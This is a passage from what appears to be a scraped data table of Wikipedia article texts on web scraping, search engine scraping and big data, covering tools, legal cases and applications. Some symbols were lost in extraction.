binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
70 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-12 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
71 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Search_engine_scraping | Search engine scraping is the process of harvesting URLs, descriptions, or other information from search engines. This is a specific form of screen scraping or web scraping dedicated to search engines only. Most commonly larger search engine optimization (SEO) providers depend on regularly scraping keywords from search engines to monitor the competitive position of their customers' websites for relevant keywords or their indexing status. The process of entering a website and extracting data in an automated fashion is also often called "crawling". Search engines get almost all their data from automated crawling bots. Google is by far the largest search engine with most users in numbers as well as most revenue in creative advertisements, which makes Google the most important search engine to scrape for SEO related companies. 1 Although Google does not take legal action against scraping, it uses a range of defensive methods that makes scraping their results a challenging task, even when the scraping tool is realistically spoofing a normal web browser: When search engine defense thinks an access might be automated, the search engine can react differently. The first layer of defense is a captcha page 4 where the user is prompted to verify they are a real person and not a bot or tool. Solving the captcha will create a cookie that permits access to the search engine again for a while. After about one day, the captcha page is displayed again. The second layer of defense is a similar error page but without captcha, in such a case the user is completely blocked from using the search engine until the temporary block is lifted, or the user changes their IP. The third layer of defense is a long-term block of the entire network segment. Google has blocked large network blocks for months. This sort of block is likely triggered by an administrator and only happens if a scraping tool is sending a very high number of requests. All these forms of detection may also happen to a normal user, especially users sharing the same IP address or network class (IPV4 ranges as well as IPv6 ranges). To scrape a search engine successfully, the two major factors are time and amount. The more keywords a user needs to scrape and the smaller the time for the job, the more difficult scraping will be and the more developed a scraping script or tool needs to be. Scraping scripts need to overcome a few technical challenges: citation needed When developing a scraper for a search engine, almost any programming language can be used. Although, depending on performance requirements, some languages will be favorable. PHP is a commonly used language to write scraping scripts for websites or backend services, since it has powerful capabilities built-in (DOM parsers, libcURL); however, its memory usage is typically 10 times the factor of a similar C C code. Ruby on Rails as well as Python are also frequently used to automated scraping jobs. Additionally, bash scripting can be used together with cURL as a command line tool to scrape a search engine. When scraping websites and services the legal part is often a big concern for companies, for web scraping it greatly depends on the country a scraping user company is from as well as which data or website is being scraped. With many different court rulings all over the world. 5 6 However, when it comes to scraping search engines the situation is different, search engines usually do not list intellectual property as they just repeat or summarize information they scraped from other websites. The largest public known incident of a search engine being scraped happened in 2011 when Microsoft was caught scraping unknown keywords from Google for their own, rather new Bing service, 7 but even this incident did not result in a court case. |
72 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Big_data | Big data primarily refers to data sets that are too large or complex to be dealt with by traditional data-processing application software. Data with many entries (rows) offer greater statistical power, while data with higher complexity (more attributes or columns) may lead to a higher false discovery rate. 2 Though used sometimes loosely partly due to a lack of formal definition, the best interpretation is that it is a large body of information that cannot be comprehended when used in small amounts only. 3 Big data analysis challenges include capturing data, data storage, data analysis, search, sharing, transfer, visualization, querying, updating, information privacy, and data source. Big data was originally associated with three key concepts: volume, variety, and velocity. 4 The analysis of big data presents challenges in sampling, and thus previously allowing for only observations and sampling. Thus a fourth concept, veracity, refers to the quality or insightfulness of the data. 5 Without sufficient investment in expertise for big data veracity, the volume and variety of data can produce costs and risks that exceed an organization's capacity to create and capture value from big data. 6 Current usage of the term big data tends to refer to the use of predictive analytics, user behavior analytics, or certain other advanced data analytics methods that extract value from big data, and seldom to a particular size of data set. "There is little doubt that the quantities of data now available are indeed large, but that's not the most relevant characteristic of this new data ecosystem. 7 Analysis of data sets can find new correlations to "spot business trends, prevent diseases, combat crime and so on". 8 Scientists, business executives, medical practitioners, advertising and governments alike regularly meet difficulties with large data-sets in areas including Internet searches, fintech, healthcare analytics, geographic information systems, urban informatics, and business informatics. Scientists encounter limitations in e-Science work, including meteorology, genomics, 9 connectomics, complex physics simulations, biology, and environmental research. 10 The size and number of available data sets have grown rapidly as data is collected by devices such as mobile devices, cheap and numerous information-sensing Internet of things devices, aerial (remote sensing) equipment, software logs, cameras, microphones, radio-frequency identification (RFID) readers and wireless sensor networks. 11 12 The world's technological per-capita capacity to store information has roughly doubled every 40 months since the 1980s; 13 as of 2012 update , every day 2.5 exabytes (2.17 260 bytes) of data are generated. 14 Based on an IDC report prediction, the global data volume was predicted to grow exponentially from 4.4 zettabytes to 44 zettabytes between 2013 and 2020. By 2025, IDC predicts there will be 163 zettabytes of data. 15 According to IDC, global spending on big data and business analytics (BDA) solutions is estimated to reach $215.7 billion in 2021. 16 17 While Statista report, the global big data market is forecasted to grow to $103 billion by 2027. 18 In 2011 McKinsey Company reported, if US healthcare were to use big data creatively and effectively to drive efficiency and quality, the sector could create more than $300 billion in value every year. 19 In the developed economies of Europe, government administrators could save more than 100 billion ($149 billion) in operational efficiency improvements alone by using big data. 19 And users of services enabled by personal-location data could capture $600 billion in consumer surplus. 19 One question for large enterprises is determining who should own big-data initiatives that affect the entire organization. 20 Relational database management systems and desktop statistical software packages used to visualize data often have difficulty processing and analyzing big data. The processing and analysis of big data may require "massively parallel software running on tens, hundreds, or even thousands of servers". 21 What qualifies as "big data" varies depending on the capabilities of those analyzing it and their tools. Furthermore, expanding capabilities make big data a moving target. "For some organizations, facing hundreds of gigabytes of data for the first time may trigger a need to reconsider data management options. For others, it may take tens or hundreds of terabytes before data size becomes a significant consideration. 22 The term big data has been in use since the 1990s, with some giving credit to John Mashey for popularizing the term. 23 24 Big data usually includes data sets with sizes beyond the ability of commonly used software tools to capture, curate, manage, and process data within a tolerable elapsed time. 25 page needed Big data philosophy encompasses unstructured, semi-structured and structured data; however, the main focus is on unstructured data. 26 Big data "size" is a constantly moving target; as of 2012 update ranging from a few dozen terabytes to many zettabytes of data. 27 Big data requires a set of techniques and technologies with new forms of integration to reveal insights from data-sets that are diverse, complex, and of a massive scale. 28 "Volume", "variety", "velocity", and various other "Vs" are added by some organizations to describe it, a revision challenged by some industry authorities. 29 The Vs of big data were often referred to as the "three Vs", "four Vs", and "five Vs". They represented the qualities of big data in volume, variety, velocity, veracity, and value. 5 Variability is often included as an additional quality of big data. A 2018 definition states "Big data is where parallel computing tools are needed to handle data", and notes, "This represents a distinct and clearly defined change in the computer science used, via parallel programming theories, and losses of some of the guarantees and capabilities made by Codd's relational model. 30 In a comparative study of big datasets, Kitchin and McArdle found that none of the commonly considered characteristics of big data appear consistently across all of the analyzed cases. 31 For this reason, other studies identified the redefinition of power dynamics in knowledge discovery as the defining trait. 32 Instead of focusing on the intrinsic characteristics of big data, this alternative perspective pushes forward a relational understanding of the object claiming that what matters is the way in which data is collected, stored, made available and analyzed. The growing maturity of the concept more starkly delineates the difference between "big data" and "business intelligence": 33 Big data can be described by the following characteristics: Other possible characteristics of big data are: 42 Big data repositories have existed in many forms, often built by corporations with a special need. Commercial vendors historically offered parallel database management systems for big data beginning in the 1990s. For many years, WinterCorp published the largest database report. 43 promotional source? Teradata Corporation in 1984 marketed the parallel processing DBC 1012 system. Teradata systems were the first to store and analyze 1 terabyte of data in 1992. Hard disk drives were 2.5 GB in 1991 so the definition of big data continuously evolves. Teradata installed the first petabyte class RDBMS based system in 2007. As of 2017 update , there are a few dozen petabyte class Teradata relational databases installed, the largest of which exceeds 50 PB. Systems up until 2008 were 100% structured relational data. Since then, Teradata has added unstructured data types including XML, JSON, and Avro. In 2000, Seisint Inc. (now LexisNexis Risk Solutions) developed a C based distributed platform for data processing and querying known as the HPCC Systems platform. This system automatically partitions, distributes, stores and delivers structured, semi-structured, and unstructured data across multiple commodity servers. Users can write data processing pipelines and queries in a declarative dataflow programming language called ECL. Data analysts working in ECL are not required to define data schemas upfront and can rather focus on the particular problem at hand, reshaping data in the best possible manner as they develop the solution. In 2004, LexisNexis acquired Seisint Inc. 44 and their high-speed parallel processing platform and successfully used this platform to integrate the data systems of Choicepoint Inc. when they acquired that company in 2008. 45 In 2011, the HPCC systems platform was open-sourced under the Apache v2.0 License. CERN and other physics experiments have collected big data sets for many decades, usually analyzed via high-throughput computing rather than the map-reduce architectures usually meant by the current "big data" movement. In 2004, Google published a paper on a process called MapReduce that uses a similar architecture. The MapReduce concept provides a parallel processing model, and an associated implementation was released to process huge amounts of data. With MapReduce, queries are split and distributed across parallel nodes and processed in parallel (the "map" step). The results are then gathered and delivered (the "reduce" step). The framework was very successful, 46 so others wanted to replicate the algorithm. Therefore, an implementation of the MapReduce framework was adopted by an Apache open-source project named "Hadoop". 47 Apache Spark was developed in 2012 in response to limitations in the MapReduce paradigm, as it adds in-memory processing and the ability to set up many operations (not just map followed by reducing). MIKE2.0 is an open approach to information management that acknowledges the need for revisions due to big data implications identified in an article titled "Big Data Solution Offering". 48 The methodology addresses handling big data in terms of useful permutations of data sources, complexity in interrelationships, and difficulty in deleting (or modifying) individual records. 49 Studies in 2012 showed that a multiple-layer architecture was one option to address the issues that big data presents. A distributed parallel architecture distributes data across multiple servers; these parallel execution environments can dramatically improve data processing speeds. This type of architecture inserts data into a parallel DBMS, which implements the use of MapReduce and Hadoop frameworks. This type of framework looks to make the processing power transparent to the end-user by using a front-end application server. 50 The data lake allows an organization to shift its focus from centralized control to a shared model to respond to the changing dynamics of information management. This enables quick segregation of data into the data lake, thereby reducing the overhead time. 51 52 A 2011 McKinsey Global Institute report characterizes the main components and ecosystem of big data as follows: 53 Multidimensional big data can also be represented as OLAP data cubes or, mathematically, tensors. Array database systems have set out to provide storage and high-level query support on this data type. Additional technologies being applied to big data include efficient tensor-based computation, 54 such as multilinear subspace learning, 55 massively parallel-processing (MPP) databases, search-based applications, data mining, 56 distributed file systems, distributed cache (e.g., burst buffer and Memcached), distributed databases, cloud and HPC-based infrastructure (applications, storage and computing resources), 57 and the Internet. citation needed Although, many approaches and technologies have been developed, it still remains difficult to carry out machine learning with big data. 58 Some MPP relational databases have the ability to store and manage petabytes of data. Implicit is the ability to load, monitor, back up, and optimize the use of the large data tables in the RDBMS. 59 promotional source? DARPA's Topological Data Analysis program seeks the fundamental structure of massive data sets and in 2008 the technology went public with the launch of a company called "Ayasdi". 60 third-party source needed The practitioners of big data analytics processes are generally hostile to slower shared storage, 61 preferring direct-attached storage (DAS) in its various forms from solid state drive (SSD) to high capacity SATA disk buried inside parallel processing nodes. The perception of shared storage architectures—storage area network (SAN) and network-attached storage (NAS)— is that they are relatively slow, complex, and expensive. These qualities are not consistent with big data analytics systems that thrive on system performance, commodity infrastructure, and low cost. Real or near-real-time information delivery is one of the defining characteristics of big data analytics. Latency is therefore avoided whenever and wherever possible. Data in direct-attached memory or disk is good—data on memory or disk at the other end of an FC SAN connection is not. The cost of an SAN at the scale needed for analytics applications is much higher than other storage techniques. Big data has increased the demand of information management specialists so much so that Software AG, Oracle Corporation, IBM, Microsoft, SAP, EMC, HP, and Dell have spent more than $15 billion on software firms specializing in data management and analytics. In 2010, this industry was worth more than $100 billion and was growing at almost 10 percent a year, about twice as fast as the software business as a whole. 8 Developed economies increasingly use data-intensive technologies. There are 4.6 billion mobile-phone subscriptions worldwide, and between 1 billion and 2 billion people accessing the internet. 8 Between 1990 and 2005, more than 1 billion people worldwide entered the middle class, which means more people became more literate, which in turn led to information growth. The world's effective capacity to exchange information through telecommunication networks was 281 petabytes in 1986, 471 petabytes in 1993, 2.2 exabytes in 2000, 65 exabytes in 2007 13 and predictions put the amount of internet traffic at 667 exabytes annually by 2014. 8 According to one estimate, one-third of the globally stored information is in the form of alphanumeric text and still image data, 62 which is the format most useful for most big data applications. This also shows the potential of yet unused data (i.e. in the form of video and audio content). While many vendors offer off-the-shelf products for big data, experts promote the development of in-house custom-tailored systems if the company has sufficient technical capabilities. 63 The use and adoption of big data within governmental processes allows efficiencies in terms of cost, productivity, and innovation, 64 but does not come without its flaws. Data analysis often requires multiple parts of government (central and local) to work in collaboration and create new and innovative processes to deliver the desired outcome. A common government organization that makes use of big data is the National Security Administration (NSA), which monitors the activities of the Internet constantly in search for potential patterns of suspicious or illegal activities their system may pick up. Civil registration and vital statistics (CRVS) collects all certificates status from birth to death. CRVS is a source of big data for governments. Research on the effective usage of information and communication technologies for development (also known as "ICT4D") suggests that big data technology can make important contributions but also present unique challenges to international development. 65 66 Advancements in big data analysis offer cost-effective opportunities to improve decision-making in critical development areas such as health care, employment, economic productivity, crime, security, and natural disaster and resource management. 67 page needed 68 69 Additionally, user-generated data offers new opportunities to give the unheard a voice. 70 However, longstanding challenges for developing regions such as inadequate technological infrastructure and economic and human resource scarcity exacerbate existing concerns with big data such as privacy, imperfect methodology, and interoperability issues. 67 page needed The challenge of "big data for development" 67 page needed is currently evolving toward the application of this data through machine learning, known as "artificial intelligence for development (AI4D). 71 A major practical application of big data for development has been "fighting poverty with data". 72 In 2015, Blumenstock and colleagues estimated predicted poverty and wealth from mobile phone metadata 73 and in 2016 Jean and colleagues combined satellite imagery and machine learning to predict poverty. 74 Using digital trace data to study the labor market and the digital economy in Latin America, Hilbert and colleagues 75 76 argue that digital trace data has several benefits such as: At the same time, working with digital trace data instead of traditional survey data does not eliminate the traditional challenges involved when working in the field of international quantitative analysis. Priorities change, but the basic discussions remain the same. Among the main challenges are: Big Data is being rapidly adopted in Finance to 1) speed up processing and 2) deliver better, more informed inferences, both internally and to the clients of the financial institutions. 78 The financial applications of Big Data range from investing decisions and trading (processing volumes of available price data, limit order books, economic data and more, all at the same time), portfolio management (optimizing over an increasingly large array of financial instruments, potentially selected from different asset classes), risk management (credit rating based on extended information), and any other aspect where the data inputs are large. 79 Big Data has also been a typical concept within the field of alternative financial service. Some of the major areas involve crowd-funding platforms and crypto currency exchanges. 80 Big data analytics has been used in healthcare in providing personalized medicine and prescriptive analytics, clinical risk intervention and predictive analytics, waste and care variability reduction, automated external and internal reporting of patient data, standardized medical terms and patient registries. 81 82 83 84 Some areas of improvement are more aspirational than actually implemented. The level of data generated within healthcare systems is not trivial. With the added adoption of mHealth, eHealth and wearable technologies the volume of data will continue to increase. This includes electronic health record data, imaging data, patient generated data, sensor data, and other forms of difficult to process data. There is now an even greater need for such environments to pay greater attention to data and information quality. 85 "Big data very often means 'dirty data' and the fraction of data inaccuracies increases with data volume growth. Human inspection at the big data scale is impossible and there is a desperate need in health service for intelligent tools for accuracy and believability control and handling of information missed. 86 While extensive information in healthcare is now electronic, it fits under the big data umbrella as most is unstructured and difficult to use. 87 The use of big data in healthcare has raised significant ethical challenges ranging from risks for individual rights, privacy and autonomy, to transparency and trust. 88 Big data in health research is particularly promising in terms of exploratory biomedical research, as data-driven analysis can move forward more quickly than hypothesis-driven research. 89 Then, trends seen in data analysis can be tested in traditional, hypothesis-driven follow up biological research and eventually clinical research. A related application sub-area, that heavily relies on big data, within the healthcare field is that of computer-aided diagnosis in medicine. 90 page needed For instance, for epilepsy monitoring it is customary to create 5 to 10 GB of data daily. 91 Similarly, a single uncompressed image of breast tomosynthesis averages 450 MB of data. 92 These are just a few of the many examples where computer-aided diagnosis uses big data. For this reason, big data has been recognized as one of the seven key challenges that computer-aided diagnosis systems need to overcome in order to reach the next level of performance. 93 A McKinsey Global Institute study found a shortage of 1.5 million highly trained data professionals and managers 53 and a number of universities 94 better source needed including University of Tennessee and UC Berkeley, have created masters programs to meet this demand. Private boot camps have also developed programs to meet that demand, including paid programs like The Data Incubator or General Assembly. 95 In the specific field of marketing, one of the problems stressed by Wedel and Kannan 96 is that marketing has several sub domains (e.g., advertising, promotions, product development, branding) that all use different types of data. To understand how the media uses big data, it is first necessary to provide some context into the mechanism used for media process. It has been suggested by Nick Couldry and Joseph Turow that practitioners in media and advertising approach big data as many actionable points of information about millions of individuals. The industry appears to be moving away from the traditional approach of using specific media environments such as newspapers, magazines, or television shows and instead taps into consumers with technologies that reach targeted people at optimal times in optimal locations. The ultimate aim is to serve or convey, a message or content that is (statistically speaking) in line with the consumer's mindset. For example, publishing environments are increasingly tailoring messages (advertisements) and content (articles) to appeal to consumers that have been exclusively gleaned through various data-mining activities. 97 Channel 4, the British public-service television broadcaster, is a leader in the field of big data and data analysis. 99 Health insurance providers are collecting data on social "determinants of health" such as food and TV consumption, marital status, clothing size, and purchasing habits, from which they make predictions on health costs, in order to spot health issues in their clients. It is controversial whether these predictions are currently being used for pricing. 100 Big data and the IoT work in conjunction. Data extracted from IoT devices provides a mapping of device inter-connectivity. Such mappings have been used by the media industry, companies, and governments to more accurately target their audience and increase media efficiency. The IoT is also increasingly adopted as a means of gathering sensory data, and this sensory data has been used in medical, 101 manufacturing 102 and transportation 103 contexts. Kevin Ashton, the digital innovation expert who is credited with coining the term, 104 defines the Internet of things in this quote: "If we had computers that knew everything there was to know about things—using data they gathered without any help from us—we would be able to track and count everything, and greatly reduce waste, loss, and cost. We would know when things needed replacing, repairing, or recalling, and whether they were fresh or past their best. Especially since 2015, big data has come to prominence within business operations as a tool to help employees work more efficiently and streamline the collection and distribution of information technology (IT). The use of big data to resolve IT and data collection issues within an enterprise is called IT operations analytics (ITOA). 105 By applying big data principles into the concepts of machine intelligence and deep computing, IT departments can predict potential issues and prevent them. 105 ITOA businesses offer platforms for systems management that bring data silos together and generate insights from the whole of the system rather than from isolated pockets of data. Compared to survey-based data collection, big data has low cost per data point, applies analysis techniques via machine learning and data mining, and includes diverse and new data sources, e.g., registers, social media, apps, and other forms digital data. Since 2018, survey scientists have started to examine how big data and survey science can complement each other to allow researchers and practitioners to improve the production of statistics and its quality. There have been three Big Data Meets Survey Science (BigSurv) conferences in 2018, 2020 (virtual), 2023, and as of 2023 update one conference forthcoming in 2025, 106 a special issue in the Social Science Computer Review, 107 a special issue in Journal of the Royal Statistical Society, 108 and a special issue in EP J Data Science, 109 and a book called Big Data Meets Social Sciences 110 edited by Craig Hill and five other Fellows of the American Statistical Association. In 2021, the founding members of BigSurv received the Warren J. Mitofsky Innovators Award from the American Association for Public Opinion Research. 111 Big data is notable in marketing due to the constant “datafication” 112 of everyday consumers of the internet, in which all forms of data are tracked. The datafication of consumers can be defined as quantifying many of or 